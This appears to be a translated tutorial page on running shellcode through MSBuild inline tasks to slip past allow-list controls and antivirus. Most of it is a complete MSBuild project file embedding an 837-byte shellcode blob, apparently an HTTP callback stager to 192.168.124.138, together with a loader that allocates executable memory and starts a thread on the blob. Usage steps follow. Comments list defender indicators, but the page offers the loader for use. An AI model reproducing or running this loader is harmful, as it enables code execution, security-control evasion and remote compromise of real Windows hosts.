Achieve effect
principle
Use MSBuild To Do More
Put simply, the msbuild command on Windows can execute files in a specific format. .NET Framework 4.0 added a feature called "Inline Tasks", declared inside the UsingTask element, which allows C# code to be executed from an XML file.
use
Because this method does not restrict the file extension — only the content format has to meet the requirements — almost any shellcode can be executed this way, bypassing allow-list checks and achieving a degree of antivirus evasion.
File reference
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
/// <summary>
/// MSBuild inline task (compiled when the project runs, via CodeTaskFactory) whose Execute()
/// copies an embedded byte array into newly allocated executable memory and starts a thread
/// at it. This is the behaviour the page describes as bypassing allow-list controls: the
/// project file is the carrier and msbuild.exe, a trusted build tool, is the host process in
/// which the bytes run.
/// Defender notes: the observable chain is msbuild.exe loading a project file from a
/// user-writable path, a VirtualAlloc with PAGE_EXECUTE_READWRITE, a Marshal.Copy into that
/// region, and a CreateThread whose start address lies in private (non-image) memory.
/// Because CodeTaskFactory compiles the class at run time, a compiler process and a temporary
/// assembly presumably accompany msbuild.exe as well — confirm on the target framework version.
/// </summary>
public class ClassExample : Task, ITask
{
// Win32 allocation constants (values match the Windows SDK): MEM_COMMIT commits the pages,
// PAGE_EXECUTE_READWRITE makes them writable and executable at the same time. An RWX
// allocation from a managed host process is a high-signal indicator on its own.
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
// P/Invoke into kernel32. Pointer-sized values (the returned address, lpStartAddr,
// lpStartAddress, lpThreadAttributes) are declared as UInt32 rather than IntPtr, so the
// address is handled as a 32-bit quantity throughout (see the Framework vs Framework64
// note at the end of the page).
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
/// <summary>
/// Entry point MSBuild calls when the "Hello" target runs. Allocates RWX memory, copies the
/// embedded bytes into it, runs them on a new thread and blocks until that thread exits.
/// </summary>
/// <returns>Always true; the task reports success regardless of what the thread did.</returns>
public override bool Execute()
{
// 837 opaque bytes embedded in the task; their provenance is not stated on this page.
// Cleartext fragments are visible in the array — the pushed pieces "wini"/"net", a
// "User-Agent: Mozilla/5.0 (...)" header, a short URI path and the IPv4 literal
// 192.168.124.138 — which suggests an HTTP callback stager (not confirmed here). Those
// strings are a ready-made match for a string/YARA scan of the file or of process memory.
byte[] shellcode = new byte[837] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0xa4, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0xbb, 0x01, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0x50, 0xe9, 0x8c, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x32, 0xc0, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x68, 0x80, 0x33, 0x00, 0x00, 0x89, 0xe0, 0x6a, 0x04, 0x50, 0x6a, 0x1f, 0x56, 0x68, 0x75, 0x46, 0x9e, 0x86, 0xff, 0xd5, 0x5f, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xca, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 
0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x75, 0x07, 0x58, 0x50, 0xe9, 0x7b, 0xff, 0xff, 0xff, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x6f, 0xff, 0xff, 0xff, 0x2f, 0x53, 0x6b, 0x39, 0x65, 0x00, 0x93, 0xf0, 0x7f, 0xc6, 0x49, 0xc8, 0xa6, 0x78, 0xe7, 0x72, 0x7f, 0x95, 0xd6, 0x5a, 0xaf, 0x0a, 0xe6, 0xbe, 0xa9, 0x32, 0x7a, 0x6a, 0xb8, 0x37, 0x02, 0xc8, 0xa2, 0xea, 0xc6, 0x54, 0x47, 0x96, 0xbe, 0xe5, 0xb4, 0x07, 0x4d, 0x93, 0x72, 0x87, 0x10, 0x86, 0xe1, 0xea, 0x46, 0x62, 0x2d, 0x07, 0xe1, 0x84, 0xec, 0xe2, 0x4b, 0xf9, 0x0e, 0x08, 0x1a, 0xcb, 0x4b, 0x88, 0x42, 0x7d, 0x58, 0x19, 0xb9, 0x43, 0xee, 0x0c, 0x49, 0x5d, 0xf5, 0x4b, 0x5c, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x39, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x31, 0x3b, 0x20, 0x57, 0x4f, 0x57, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x35, 0x2e, 0x30, 0x3b, 0x20, 0x41, 0x76, 0x61, 0x6e, 0x74, 0x20, 0x42, 0x72, 0x6f, 0x77, 0x73, 0x65, 0x72, 0x29, 0x0d, 0x0a, 0x00, 0xf4, 0xd2, 0xd8, 0x55, 0xc7, 0x33, 0x93, 0x3c, 0xda, 0x85, 0x1b, 0x7c, 0x41, 0xbf, 0xf5, 0x7c, 0xe5, 0x66, 0xf2, 0x6e, 0x00, 0x71, 0xfe, 0x58, 0x6a, 0xd1, 0x03, 0x3a, 0xb4, 0x88, 0xee, 0xf8, 0xb8, 0xb7, 0x57, 0xf4, 0x33, 0xba, 0x96, 0xfd, 0x90, 0xdd, 0x0f, 0x7f, 0xcf, 0x30, 0x6e, 0x67, 0xe6, 0x31, 0x27, 0x8c, 0xf0, 0xe0, 0x3c, 0xe6, 0xf8, 0x53, 0xad, 0x6d, 0xcf, 0x7d, 0x2a, 0x5d, 0x86, 0x61, 0x4e, 0xe3, 0xae, 0x9e, 0xaf, 0x41, 0xbd, 0x01, 0x32, 0xdd, 0x9e, 0x71, 0x4d, 0xfe, 0x57, 0xfc, 0x0a, 0x40, 0x73, 0x46, 0x4b, 0xb5, 0x02, 0x0f, 0x39, 0xe4, 0xdb, 0x81, 0x09, 0xb4, 0x6a, 0xd7, 0x96, 0x0c, 0x03, 0x4b, 0x0b, 0xe8, 0x5e, 0xd4, 0xa8, 0x31, 0x44, 0x82, 0xaf, 0xf5, 0x8f, 0x24, 0xb6, 0x05, 0x77, 0x4c, 0xb4, 0x05, 
0x8b, 0x97, 0x37, 0x93, 0x43, 0x53, 0xea, 0xea, 0x11, 0xcf, 0xda, 0x43, 0xdc, 0x34, 0x1c, 0xa0, 0x2c, 0x27, 0x0b, 0x60, 0xfa, 0x15, 0x63, 0xa8, 0x1f, 0x8f, 0xd2, 0x71, 0xef, 0x55, 0x04, 0xd3, 0x60, 0x00, 0xbf, 0x1f, 0xd8, 0xb7, 0xb5, 0x86, 0x31, 0x32, 0x98, 0x2f, 0xdc, 0x5a, 0xdf, 0x08, 0x48, 0x85, 0x9e, 0x80, 0x39, 0x74, 0x30, 0x09, 0x81, 0x07, 0x57, 0x39, 0x6b, 0x9c, 0xbe, 0x15, 0xdf, 0x4b, 0x0b, 0xe3, 0xf3, 0xb0, 0x05, 0xab, 0xbd, 0xc1, 0xfe, 0x02, 0x97, 0x14, 0xd4, 0xfd, 0x8e, 0xc8, 0xb9, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0x89, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x32, 0x34, 0x2e, 0x31, 0x33, 0x38, 0x00, 0x12, 0x34, 0x56, 0x78 };
// Commit a fresh RWX region sized to the blob. The return value is not checked, so a failed
// allocation (0) is not handled before the copy below.
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Managed-to-unmanaged copy of the bytes into the executable region.
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero; // passed as the thread parameter; nothing else reads it
// Start a thread whose start address is the private allocation rather than a loaded
// image — the "thread start in unbacked memory" condition memory scanners commonly key on.
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
// 0xFFFFFFFF is INFINITE: Execute() blocks, so the build (and msbuild.exe) stays alive for
// as long as the thread runs.
WaitForSingleObject(hThread, 0xFFFFFFFF);
// hThread is never closed (no CloseHandle); it leaks for the life of the process.
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
other
The msbuild command must be run from the specified folder, and the version must be 4.0.
The difference between the two folders in the figure below: if your shellcode is 64-bit, choose Framework64; if it is 32-bit, choose Framework.
Select version 4.0 to enter the folder.
You can execute the msbuild command in this folder.
The command format is `msbuild file_path`.